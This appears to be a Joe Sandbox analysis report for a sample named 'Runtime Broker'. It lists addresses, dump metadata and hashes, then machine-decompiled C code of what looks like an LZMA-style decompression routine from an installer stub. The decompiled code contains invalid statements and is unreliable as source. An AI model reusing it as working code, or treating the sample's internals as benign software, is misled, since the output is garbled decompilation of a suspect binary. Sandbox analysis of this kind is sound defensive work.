0x00000000
0x00000000
0x00407079
0x0040707b
0x00407082
0x00407083
0x00407085
0x00407088
0x00000000
0x00000000
0x00407090
0x00407093
0x00407096
0x00407098
0x0040709a
0x0040709a
0x0040709b
0x0040709e
0x004070a5
0x004070a8
0x004070b6
0x00000000
0x00000000
0x0040738c
0x0040738c
0x0040738f
0x00407396
0x00000000
0x00000000
0x0040739b
0x0040739b
0x0040739f
0x004074d7
0x00000000
0x004074d7
0x004073a5
0x004073a8
0x004073ab
0x004073af
0x004073b2
0x004073b8
0x004073ba
0x004073ba
0x004073ba
0x004073bd
0x004073c0
0x004073c0
0x004073c0
0x004073c0
0x004073c3
0x004073c3
0x004073c7
0x00407427
0x0040742a
0x0040742f
0x00407430
0x00407432
0x00407434
0x00407437
0x00407343
0x00407343
0x00000000
0x00407349
0x00407343
0x004073c9
0x004073cf
0x004073d2
0x004073d5
0x004073d8
0x004073db
0x004073de
0x004073e1
0x004073e4
0x004073e7
0x004073ea
0x00407403
0x00407406
0x00407409
0x0040740c
0x00407410
0x00407412
0x00407412
0x00407413
0x00407416
0x004073ec
0x004073ec
0x004073f4
0x004073f9
0x004073fb
0x004073fe
0x004073fe
0x00407419
0x00407420
0x00000000
0x00407422
0x00000000
0x00407422
0x00000000
0x004070be
0x004070c1
0x004070f7
0x00407227
0x00407227
0x00407227
0x00407227
0x0040722a
0x0040722a
0x0040722d
0x0040722f
0x004074b9
0x00000000
0x004074b9
0x00407235
0x00407238
0x00000000
0x00000000
0x0040723e
0x00407242
0x00407245
0x00407245
0x00407245
0x00000000
0x00407245
0x004070c3
0x004070c5
0x004070c7
0x004070c9
0x004070cc
0x004070cd
0x004070cf
0x004070d1
0x004070d4
0x004070d7
0x004070ed
0x004070f2
0x0040712a
0x0040712a
0x0040712e
0x0040715a
0x0040715c
0x00407163
0x00407166
0x00407169
0x00407169
0x0040716e
0x0040716e
0x00407170
0x00407173
0x0040717a
0x0040717d
0x004071aa
0x004071aa
0x004071ad
0x004071b0
0x00407224
0x00407224
0x00407224
0x00000000
0x00407224
0x004071b2
0x004071b8
0x004071bb
0x004071be
0x004071c1
0x004071c4
0x004071c7
0x004071ca
0x004071cd
0x004071d0
0x004071d3
0x004071ec
0x004071ee
0x004071f1
0x004071f2
0x004071f5
0x004071f7
0x004071fa
0x004071fc
0x004071fe
0x00407201
0x00407203
0x00407206
0x0040720a
0x0040720c
0x0040720c
0x0040720d
0x00407210
0x00407213
0x004071d5
0x004071d5
0x004071dd
0x004071e2
0x004071e4
0x004071e7
0x004071e7
0x00407216
0x0040721d
0x004071a7
0x004071a7
0x004071a7
0x004071a7
0x00000000
0x0040721f
0x00000000
0x0040721f
0x0040721d
0x00407130
0x00407133
0x00407135
0x00407138
0x0040713b
0x0040713e
0x00407140
0x00407143
0x00407146
0x00407146
0x00407149
0x00407149
0x0040714c
0x00407153
0x00407127
0x00407127
0x00407127
0x00407127
0x00000000
0x00407155
0x00000000
0x00407155
0x00407153
0x004070d9
0x004070dc
0x004070de
0x004070e1
0x00000000
0x00000000
0x00406e40
0x00406e40
0x00406e44
0x00407489
0x00000000
0x00407489
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5e
0x00406e61
0x00406e64
0x00406e67
0x00406e69
0x00406e69
0x00406e69
0x00000000
0x00000000
0x00406fcb
0x00406fcb
0x00406fcf
0x00407495
0x00000000
0x00407495
0x00406fd5
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe0
0x00406fe0
0x00406fe0
0x00406fe3
0x00406fe6
0x00406fe9
0x00406fec
0x00406fef
0x00406ff2
0x00406ff3
0x00406ff5
0x00406ff5
0x00406ff5
0x00406ff8
0x00406ffb
0x00406ffe
0x00407001
0x00407001
0x00407001
0x00407004
0x00407006
0x00407006
0x00000000
0x00000000
0x00407248
0x00407248
0x00407248
0x0040724c
0x00000000
0x00000000
0x00407252
0x00407255
0x00407258
0x0040725b
0x0040725d
0x0040725d
0x0040725d
0x00407260
0x00407263
0x00407266
0x00407269
0x0040726c
0x0040726f
0x00407270
0x00407272
0x00407272
0x00407272
0x00407275
0x00407278
0x0040727b
0x0040727e
0x00407281
0x00407285
0x00407287
0x0040728a
0x00000000
0x0040728c
0x00407009
0x00407009
0x00000000
0x00407009
0x0040728a
0x004074bf
0x00000000
0x00000000
0x00406aee
0x004074f6
0x004074f6
0x00000000
0x004074f6
0x00407343
0x004072ca
0x004072c7
0x00000000
0x0040701c

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afcc572d84cf9765722162092f48605f1f6e2a9c19f2086930970e637c6b8744
Instruction ID: ba5f555e51aa8b1381cdd2b0d2a1af6e0fef70f9c7cb40d8a5f6f768353cc961
Opcode Fuzzy Hash: afcc572d84cf9765722162092f48605f1f6e2a9c19f2086930970e637c6b8744
Instruction Fuzzy Hash: 30713371E04228CFDF28CFA8C854BADBBB1FB44305F15806AD856BB281C7786986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406F64, Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406F64() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004074FE))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
